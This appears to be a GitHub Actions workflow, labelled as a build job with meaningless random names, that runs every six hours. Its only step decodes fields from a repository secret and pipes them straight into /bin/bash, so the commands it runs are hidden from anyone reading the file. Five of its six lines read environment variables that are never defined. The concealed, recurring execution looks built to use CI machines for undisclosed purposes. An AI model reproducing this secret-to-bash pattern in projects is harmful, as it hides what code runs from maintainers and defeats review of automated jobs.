name: chenzhishi4567
on:
  workflow_dispatch:
  schedule:
    - cron: '8 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: chenzhishi4567
        env:
          lrh81: ${{ secrets.lrh81 }}
        run: |
          echo $lrh81 | jq -r .dbgtr4300 | /bin/bash
          echo $lz68084 | jq -r .hvg8616 | /bin/bash
          echo $dursz5 | jq -r .anc16 | /bin/bash
          echo $xqsx6474 | jq -r .d77700 | /bin/bash
          echo $zp9 | jq -r .y92859 | /bin/bash
          echo $gwptr87549 | jq -r .hjlk4299 | /bin/bash

